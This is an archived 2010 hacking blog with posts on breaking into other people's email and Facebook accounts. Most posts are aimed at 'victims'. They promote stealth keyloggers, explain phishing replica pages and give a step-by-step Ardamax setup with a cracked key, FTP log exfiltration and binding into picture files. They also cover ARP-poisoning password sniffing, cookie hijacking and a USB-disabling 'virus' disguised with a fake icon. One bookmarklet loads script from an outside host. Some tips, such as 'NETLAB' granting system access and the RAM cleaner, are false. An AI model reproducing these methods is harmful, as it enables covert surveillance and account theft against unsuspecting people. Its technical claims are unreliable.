Wednesday, September 1, 2010

How To Hack eMail Password - eMail Hacking

I know most of you might be wondering to know how to hack email? You as the reader are most likely reading this because you want to hack into someone’s email. Well before you try to hack any E-Mail password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack E-Mail password?” So in this post I have taken up this topic to show you the possible ways to do that!


Is it possible to hack emails?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come across any website that claims to sell such softwares, I would advise you not to trust them.

2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.

So, guys, remember this is all crap. There's no reality in this email hacking service or software.

How can we Hack Email Password?

Hacking email passwords is not that easy. You can't do that by simply entering the email address and waiting for the software to crack passwords. Instead, you have to fool victim to give his own password without his knowledge. The main methods used to hack Email passwords are:

1. Remote Spy Software

The easiest way to hack an email is by using a remote spy software (Also known as keylogger). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. Once installed, this program will automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer. Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack email password. I recommend the following keylogger as the best for gaining access to email password.
SniperSpy is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!

Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!


Why SniperSpy is the best?

Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected. This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Includes LIVE admin and control commands!

SniperSpy Features:
  • Access ANY Password
With SniperSpy you can hack any password and gain access to email or any other online account.
  • Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
  • Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.
  • Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.
  • Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.
  • Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
  • Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.

So what are you waiting for? If you are really serious to hack E-Mail Password then SniperSpy is for you. Go grab it now and expose the truth!


The Official Website of SniperSpy


2. Other Ways to Hack E-Mail Password


- Phishing

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.

How does it work:

You can download/make a replica of the website you want to phish and save is as HTML. When you’re done with that, you have to find a way to upload the HTML. You can use free hosting site or a website like Blogspot, Piczo, etc. When the victim enters his email and password on the login field, phishing site save those login details and they will be automatically sent to you by mail.

Perform Phishing


- Bruteforcing

This is somewhat debating method. I have never personally tried but, read on various site and hacking forums. It is said that Hotmail accounts can be bruteforced. In Bruteforcing, you have to get wordlist - which contains various words and these words are tried out as passwords for victim hotmail account. Generally, for other sites like Gmail, Yahoo, etc. you have limited account login chances and once that number of chances expire, you are not allowed even to try to login. This mechanism helps in avoiding Bruteforce attack against email accounts. So, it is debating to say that Hotmail account passwords can be hacked (actually cracked) by Bruteforcing.

The most famous Bruteforcing software used is Brutus. But, remember, for hacking hotmail account password by Bruteforcing, you must have good quality wordlist which can be obtained via Google.


- Social engineering

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engineering is method of retrieving password or answer of security question simply be queering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


- USB Thief

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. Read my article How to Hack Passwords Using USB Pen Drive for more information.


So friends, these are most useful ways to hack email account password. I have tested most of them and found to be working to hack email account password. Just give them a try to hack your victim email account passwords. I will appreciate your effort if you mention any other email hacking method you found great to hack email account password. Happy Email Hacking!

Tuesday, August 31, 2010

Transparent Window!!

First Run "Glass" Program and then press Ctrl+Shift+1 or 2 or 3......or 0.
By this your window become transparent.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post -.How to complie c programs
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

Monday, August 30, 2010

Some kool Javascripts for fun

Copy the scripts in adress bar (plae where u typewww.google.co.in ) and hit enter..

1)
This piece of code pulls off all the images from your web page and rotates them in a circle. Really makes any page go naked (without its images). The best place to test is a website with many images. (Google Images for an example)

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);


2)
This code lets you edit any page/website in real-time. With Firefox, you can even edit and save the modified pages to your computer. a nice one.. i love this

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

3)
There are times when you are not sure that the website that you are visiting is authentic. Use this code whenever in doubt :-

Copy the code from here and paste into browsers address bar..

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

4)
hake the Browser...

How about shaking the internet browser window?

Copy paste the code on the browser's address bar and press enter...

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i) ;self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)


And finally Try this one


javascript:function reverse() { var inp = " This emoticon has been enhanced by Facicons xnaht yas ot tegrof tnoD ,skcoR diawaJ namialuS
...yad lufrednow a evaH "; var outp = ""; for (i = 0; i <= inp.length ; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
 
Reveal*****(Asterisk) Pasword Using Javascript


Follow the steps given below--->

1> Open the Login Page of any website (Exp- gmail.com)

2> Type "Username" & "Password"

3>Copy & Paste the JavaScript Code given bellow into ur Broswer's add bar & hit Enter

javascript: alert(document.getElementById('Passwd').value);

4>AS soon as u hit 'Enter',A window pops up showing Password typed by you.........
 
Full Page JavaScript : All Posts in One Page (for orkut)

When you will run this script, it will show all the posts of the topic in that page only! So no need to click the "next" button, to reach your post. This will make your work easy.

Here's the code,copy it to ur url :

javascript: ($ = (d = document).createElement("script")).src = "http://im.su.ly/UL.php";void(d.body.appendChild($))

Computer Tricks!!

Clean ur RAM by notepad
Clean Ur RAM--
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM is cleaned
Of course u can edit the code in the file for a greater "cleaning-progress".


FreeMem=Space(1280000000)
 
How To Customise Your start Button

First you need a tool called "Resource Hacker". This free program allows you to change resources in any .exe file such as "Explorer.exe", which includes the [Start] button's Label. You can visit Download.com and search there for "Resource Hacker".
After you download it, follow the guide here:--


Step 1:

A - Run "Resource Hacker" and open the file "%windir%\Explorer.exe".
B - You see a Tree of all Resources in this file, expand the "String Table"
C - Find the "start" and replace it with your own text. then press the [Compile Script] button.
D - Save "Explorer.exe" as "MyStart.exe" DONT save it as Explorer.exe, do "save as.." and give it a new name.
E - Quit "Resource Hacker".

Step 2:

A - Click on the [Start] button and choose the "Run..." item from the start menu. (Or use the shortcut key WinKey+R)
B - Type "RegEdit" in the Run "Dialog Box". And then press the [Ok] buton to run the "Registry Editor" program.
C - Go to: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon" and find the "Shell" property.
D - Replace value of the "Shell" property to "MyStart.exe".
E - Quit "Registry Editor".
F - Restart your system.
Note about Registry Editor:
if you did not find the key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon", you can search the Registry for the "Explorer.exe", to do this use the Edit Menu | Find Next (Ctrl+F).
 
DELETE SHUTDOWN BUTTON FROM START MENU

Another easier method will b thru the group policy editor...

1) Run ( Windows key+ R)
2) Type gpedit.msc
3)User Configuration >> Administrative templates >> Taskbar and start menu >> Locate
" Prevent access to Shut Down command.."

ENJOY.... 
 
FOLDER OPTION MISSING

Windows explorer due to some virus or trojan effect.
Here's the solution-->

Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

I hopes that you will find the option after restarting windows..

Change the NAME OF RECYCLE BIN


1. Click Start
2. Click Run
3. Type regedit and hit ENTER
4. In the registry editor go to the following key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

5. Double click on the following value:
@C:\WINDOWS\system32\SHELL32.dll,-8964

6. AFTER DOUBLE CLICKING Change the NAME FROM RECYCLE BIN to whatever you wish.

7. Click OK and close out regedit
8. Click on a blank area of the desktop and select refresh from the context menu.
9. After the screen refreshes, you recycle bin will be renamed to whatever you decided.

DOS Commands!!

Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Adobe Photoshop (if installed) - photoshop
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator – calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts
Iexpress Wizard - iexpress
Indexing Service - ciadv.msc
Internet Explorer – iexplore
Internet Properties - inetcpl.cpl

Hack into Someone's PC using Keylogger

Ardamax Keylogger
============

Ardamax Keylogger 2.9 is good, but not as good as Ardamax Keylogger 2.8, reason being is because on Ardamax Keylogger 2.9, when your victim clicks the file, it comes up saying "This will install Ardamax monitoring tool, do you wish to continue?", where as if you use Ardamax 2.8, it will just infect they're PC when they click it, nothing comes up, it'll just auto-install.


A- Getting Ardamax and Registering it.
========================

1. Get Ardamax 2.8 or 2.9 (I HIGHLY recommend 2.8
Ardamax Keylogger 2.8-http://rapidshare.com/files/151005523/setup_akl.zip.html
Ardamax Keylogger 2.9-http://rapidshare.com/files/151005680/setup_akl2.zip.html

2. Once downloaded, you'll see a little note-pad icon in your desk-top icon bar thing (bottom right of your screen), now right-hand
click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says
registration key:
Name: Membros
Key: CKPIUQDMITNVNRI
Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'


B- the Keylogger Engine.
===============

1. Now your going to make the Keylogger Engine (The thing you send out over msn or whatever). Click 'Remote Installation...', now,

click 'next' until you get to Appearences (it might come up straight away for Ardamax 2.9, but I can't be asked checking).

2. now your at Appearences, click 'Additional components:' and un-tick 'Log Viewer' then click 'Next'.

3. now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.

4. Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy

so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.

5. Now you should be at 'Web Update', just click 'Next' when your here.

6. Ok, you should now be at 'Options', this all depends on you, if you want your Keylogger to be a secret on your computer so your

family know you ain't been up to anything naughty, then tick 'Start in hidden mode' and click 'Next'
(Remember, if in future you want to make a new Keylogger Engine, then press: CTRL + SHIFT + ALT + H at the same time.

7. Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then

where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only

if log size exceeds', once thats done,

8. Now you should be at 'FTP', ok, creat a free account at DriveHQ.com, then make sure your at 'Online Storage', then make a new
folder called: Logs
(this is where the logs are sent to when you keylogg someone)
Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this: http://ftp.drivehq.com/
Now where it says 'Remote Folder:', put this: Logs
Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password
Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.

9. You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.

10. Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.

11. Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger egine
path:', click 'browse' and choose where you want to put your Keylogger Engine (I suggest 'My Documents').
Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon
you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.
Watch the video on how to do all this here


C- Binding the Keylogger Engine with another file.
==============================

1. Download the Binding Tool:
Easy Binder 2.0----http://rapidshare.com/files/151005958/Easy_Binder.zip.html

2. Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to 'My Documents'
(or where-ever you put the Keylogger Engine) and then click the file called 'Install'.

3. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.

4. You need to get a .ico image, this is easy, just go to http://www.chami.com/html-kit/services/favicon/ and upload the Image you
want to be converted to .ico, once its done, click 'download'.

5. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it
says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so;

6. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to
be saved (I recommend My Documents so you don't forget), put the name you want on the file and then click 'Save'.

Video link for this tutorial : http://www.youtube.com/watch?v=84qNWuICm5A


D- Spread Through HTML
================

You can also spread it by HTML attck
the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as "index.html" and then upload it to the same host.

All done, now everytime someone opens that webpage they would be infected with your trojan's server

http://tinypaste.com/6b4b3

Easy way 2 hack into a system!

Well as i already mentioned u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

steps: -

1.Download software PORT SCANNER.
2.Copy the ip address of the victim whose port is open.
3.Download NETLAB which gives u all information includes victim ip address,Area from where he is accessing internet....
4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.


how to sniff the passwords & chat conversations!!

In this post i will show you how to sniff the passwords & chat conversations in your lan this is only the basic tut my next post will be covering arp poisoning with this u can make filter & fine-tune all the date of the victim
hii guys in this post i will show u how to use cain & abel its the best & fastest tool both for sniffing & cracking the passwords
Download Link :- http://oxid.netsons.org/download/ca_setup.exe (sometimes the link doesn’t work)
what’s Cain & Able ?
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force & Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords & analyzing routing protocols. (taken from their website)
This tutorial is meant for sniffing only there’s a lot other things you can do with cain as mentioned above
Softpedia link :- > here <
How to sniff with CAIN
Step 1:- Install Cain & Launch it
Step 2:- Click on Sniffer tab
Step 3:- Activate the sniffer by clicking 2nd icon (seems like micro chip — tooltip says Start/Stop Sniffer) from the left on top bar

Step 4:- Click on blue coloured & icon to scan for MAC address on LAN or basically right click ->scan MAC address
Step 5:- Click OK on the next window that comes -> CAIN is told to scan all the host in our subnet
Step 6:- Click on APR tab at the bottom
Step 7: Now Click on the & sign again at the top to add Computers to sniff on . A windows will pop up . In that windows . Select the router/gateway of your lan on the left side & the computer you need to sniff on the right side. Mostly the gateway is the two with ending octet 1 eg. 10.10.10.1 or 10.129.71.1 as in my case. Ususally last no. is 1
Step 8:- Now you’ll see the computers are added to the list. Click on 3rd icon from the left on the top which is like has a biohazard sign . You’ll see something like this
Step 9:- Step back & relax & let cain do its work you’ll see passwords rolling in passwords tab.(click it to enter password)

well its 3 in the morning & i don’t think somebody else is online besides me so this picture does’t show you any passwords
Suggestions & Feedbacks are appreciated
related post :Arp poisoning to redirect the victom to other site in your lan
This tutorial will cover (version 4.9.8)
check complete tut that cain & abel can do
Cain is an easy application to install & configure. However, there’s several powerful tools that should only be configured after you fully understand both the capabilities & consequences to the application & the target network. After all, you can’t well hack a network if you take it down. Proceed with caution.
INTRODUCTION
1. Enumerate the computers on the network
they need to accomplish the following steps to get the admin account:
3. Harvest user account information
2. connect to a computer & install the Abel remote app
5. Login to the target machine with the admin account
4. Crack user account information passwords to get the admin account
7. Harvest all of the hashes from a server & sent to the cracker
6. Install the Abel service on the target server
First things first, after you launch the application you will need configure the Sniffer to use the appropriate network card. If you’ve multiple network cards, it might be useful to know what your MAC address is for your primary connection or the two that you will be using for Cain network access. You can determine your MAC address by performing the following steps:
two times they’ve the admin account on the server, the rest is up to you.
1. Go to “Start”
2. Run
3. enter the “CMD”
4. A black window will appear
5. Enter the following information in to the window without the quotes
“Ipconfig /all” & then Enter
6. Determine which two of the Ethernet adapters you are using & copy the MAC address to notepad. You use this to help determine which NIC to select in the Cain application
With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the tool with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. While they are here, let’s review a number of the other tabs & information in the Configuration Dialog Box. Here is a brief description of each tab & its configuration:
Sniffer Tab: allows the user to specify the Ethernet interface & the start up options for the sniffer & ARP features of the application.
ARP Tab: Allows the user to in effect to lie to the network & tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is useful in that you can impersonate the other tool & have all traffic for that tool “routed” to you workstation. Keep in mind that servers & routers & designed for multiple high capacity connections. If the tool that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down & even come to a halt. This will surly lead to your detection & eventual demise as a hacker as the event is easily detected & tracked with the right equipment.
Filters & Ports: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on two of the services you will be able to change both the TCP & UDP ports. But this won’t be necessary for this tutorial, but will be useful future tutorials.
HTTP Fields: Several features of the application such as the LSA Secrets dumper, HTTP Sniffer & ARP-HTTPS will parse the sniffed or stored information from web pages viewed. basically put, the more fields that you add to the HTTP & passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.
Traceroute: trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, & Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.
Console: This is the command prompt on the remote machine. Anything that you can do on your computer from the CMD prompt can be done from here. Examples include mapping a drive back to your computer & copying all the files from the target or adding local users to the local security groups or anything . With windows, everything is possible from the command prompt.
Hashes: Allows for the enumeration of user accounts & their associated hashes with further ability to send all harvested information to the cracker.
LSA Secrets: Windows NT & Windows 2000 support cached logon accounts. The operating process default is to cache (store locally), the last 10 passwords. there’s registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names & passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE SECURITYPolicySecrets
TCP Table: A simple listing of all of the processes & ports that are jogging & their TCP session status.
Routes: From this object, you can determine all of the networks that this tool is aware of. This can be powerful if the tool is multihommed on two different networks.
UDP Table: A simple listing of all of the processes & ports that are jogging & their UDP session status.
Dictionary Cracking – Select all of the hashes & select Dictionary Attack (LM). You could select the NTLM but the method is slower & with few exceptions the NTLM & NT passwords are the same & NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary files.you have to download the tables.and copy them to cain installation directory, Check the following boxes: As is Password, Reverse, Lowercase, uppercase, & two numbers.)
Dictionary Cracking process
Click start & watch Cain work. The more lists & words that you’ve, the longer it will take. When Cain is completed, click exit & then look at the NT password column. All of the passwords cracked will show up next to the now owned accounts.
Take a second to look carefully at the accounts & passwords in the list. Look for patterns like the use of letters & characters in sequence. plenty of administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to generate all possible combinations & shorten the window.
Alright then… Resort your hashes so single out the accounts that you’ve left to crack. Now select all of the un-cracked or guessed accounts & right click on the accounts again & select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go speedy. Take a second to review your progress & look for additional patterns.
Cryptanalysis attacking
At this point, use program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you’ve gotten any admin level accounts. two times you move to the next step, which is bruting, most of what you’ve left are long passwords that are going to be difficult & time consuming. Any time saver applications that you can find will be helpful.
Bruting
Repeat the same method for selecting the accounts. Here is the first time that you will actually have to use your brain Bruting can be very time consuming. Look closely at all of the passwords that you’ve cracked & look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The objective is to use the least amount of characters & symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts & follow the previous steps & select Brute Force (LM). The default for LM is A-Z & 0-9. This is because that is due nature of LM hashes & the way that they are stored. Another note is that sometimes you will see a “?” or several “????” & then some numbers or letters. This is also due to the nature of NT versus NTLM & the method that NT used to store passwords. If not see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords & those accounts with an “*” in the <8>
Some definition
MAC: Media Access Control – In computer networking a media access control address (MAC address) is a code on most forms of networking equipment that allows for that tool to be uniquely identified. Each manufacturer for Network Cards has been assigned a predefined range or block of numbers.
Sniffing: Sniffing is the act or method of “Listening” to some or all of the information that is being transmitted on the same network segment that a tool is on. On an OSI Model Layer 1 network, even the most basic Sniffers are capable of “hearing” all of the traffic that is sent across a LAN. Moving to a Layer 2 network complicates the method , however tools like Cain allow for the spanning of all ports to allow the exploitation of layer 2 switched networks.
ARP: Address Resolution Protocol – Address Resolution Protocol; a TCP/IP function for associating an IP address with a link-level address. Understanding ARP & its functions & capabilities are key skills for hackers & security professionals alike. A basic understanding of ARP is necessary to properly utilize all of the functions that Cain is capable of.

Hack Facebook!!

Facebook is one of the most widely used Social Networking website by many teenagers across the world . most of them are now a days making the fake accounts both for abuse or maintaining secret relations. So, it’s no wonder many people want to know how to hack a Facebook account.
now i will show you some of the working and best ways to hack a Facebook account
now a days the security standards are greatly increased even the brute force attacks don’t work don’t get fooled there are so many people who try to fool the people by telling them to hack Facebook and any other service like orkut ,gmail,yahoo, orkut, there are only at most 5 ways to hack into these but newbie can at most use 3 types you must learn so much to try 4-5 ways and these 4-5 ways are almost have 99 % success rate
In this post i am going to discuss 3 fool proof methods and some intro abt the remaining 4th and 5th methods

1.BEST AND EASIEST WAY TO HACK A Facebook

The easy way to hack in to the Facebook account is through keyloggers
check this post i have covered all the topics about key loggers and using them to hack Facebook accounts
Hacking with Keyloggers :Topics covered
1. What is a keylogger?
2. Where to get the key logger programs and download links
3. How to install a keylogger
4.what to do when you don’t have the physical access
5. What to do target OR victim refuses to run the file?
6.Which is the best spying or keylogger soft

2. how to hack Facebook using the Trojan

This is same as the keyloggers if u want more control over the victom then u can use trojans (Rats) these are remote administrator tools which give the complete control over the victim system
check this post : how to use the trojans to hack Facebook
i covered full topics on using the trojans
1. What is a trojan?

2. Where to get the trojan programs and download links

3. How to install a trojan

4.what to do when you don’t have the physical access

5. What to do target OR victom refuses to run the file?

6.Which is the best trojans or rat software

3.HACKING Facebook ACCOUT BY PHISHING

PHISHING is the most commonly used method to hack into any web based systems like orkut ,gmail ,yahoo.
phishing is proved the best and easy way to hack into any web based system u can even hack into Facebook it has high success rate . And also there is no need of any scripting knowledge like html just upload the page to any free hosting accounts and send to the victim.
if u want the Facebook fake page go to here :

4-5 th method of hacking into Facebook

These methods are very complicated and canot be used by the new bies this involves finding the vonerabilities and exploiting them to gain the tool access
this has very high success rate the only difficult part is to find the ip of the victim
If you just wanna give a try these software : metasploit
UPDATE:
6 : NEW Face book hacks
FBController – The Ultimate Utility to Control Facebook Accounts

You need to feed it biscuits (cookies) before you can do anything.
You can get the target’s cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, Scroogle search or however you like.
Once you have the cookies you can use FBController to have Full control over the target’s Facebook account.
Login to your Facebook account and sniff your own cookie OR collect a few live Facebook Biscuit/s of your Target/s.
Till now FBController version 1.0 uses your Target’s provided cookie and only :
A > Downloads the HomePage.
B > Allows you to Update the Target’s Wall and
C > Retrieve your Target’s Friend’s List
There are many APIs available to write apps and 3rd party Tools for FB in Java, Perl, .NET, etc.
FBConTroller was entirely written without knowing any of Facebook’s Dev API’s. Considering the above along with Facebook’s complexity, the next version might take some time to get released
You can download FBController here:
happy hacking 

View Private Photos on Facebook


HOT APP TO SEE THE PICS OF PEOPLE WHO ARE NOT UR FRIENDS !!!




First go to :
http://apps.facebook.com/josh_owns/


Accept the app then you'll do anything you want : just copy/cut the ID, or the Name of the person and enjoy


You can even download the entire album.



If you dont want to go to http://apps.facebook.com/josh_owns/
each time there is an addon specific :
https://addons.mozilla.org/en-US/firefox/addon/12454

Hack an email!

So many people have asked that question,and honestly its a dumb one.But its our job,to help you,so i made this thread.
There are many ways to hack an email:
Phishing
Phishing is a way of saying keylogger but in an other meaning.Let’s say you want to create a hotmail phishing page.The page should look
exactly like the real one.
How does it work:
You can download/make a replica of the website you want to phish.And save is as HTML.When you’re done with that,you have to find a way
to upload the HTML.Best way is a Website.Like Piczo/Blogspot.When thats done the user types his/hers username and password.And automatically
it will be sent to you by mail.And there you have it,that’s Phishing.
Here Are Some Tutorials That Help:
http://www.hackforums.net/showthread.php?tid=15895
http://www.hackforums.net/showthread.php?tid=14154
http://www.hackforums.net/showthread.php?tid=12583
http://www.hackforums.net/showthread.php?tid=12468
Brute Forcing
Brute Forcing is like guessing the password , but instead you make/download a password list[a long txt file containing words that might be
the password] ad the Brute Forcer tries them all
Download your Msn Brute Forcer Here:
http://www.speedyshare.com/228815220.html [may find a trojan inside but that's normal]
Download Password Lists here:
http://www.hackforums.net/showthread.php?tid=15562
Keyloggers
Keyloggers is like phishing but is more simple.Its a simple .exe executable.When someone clicks it,the Keylogger auto downloads.And you’ll
have ,on your computer,you start it,and put in the ip of the destination,and every hour you’ll receive keys pressed on his computer
thats an easy way to find out msn passwords
Here are some tutorials:
http://www.hackforums.net/showthread.php?tid=15003
http://www.hackforums.net/showthread.php?tid=10365
Fake Msn
Fake msn is just a replica of Msn Messenger.Let some of your friends come over.And open up the fake msn.Let them type in ther
msn hotmail,and their password.Then they will get a troubleshoot , and their username/password will be saved in a .txt file in C:\
Download here:
http://www.savefile.com/files/1357897
Guessing The Secret Question
If you know your friends,this will be an easy task.Go to http://www.hotmail.com and click forgot password,then put in the email address
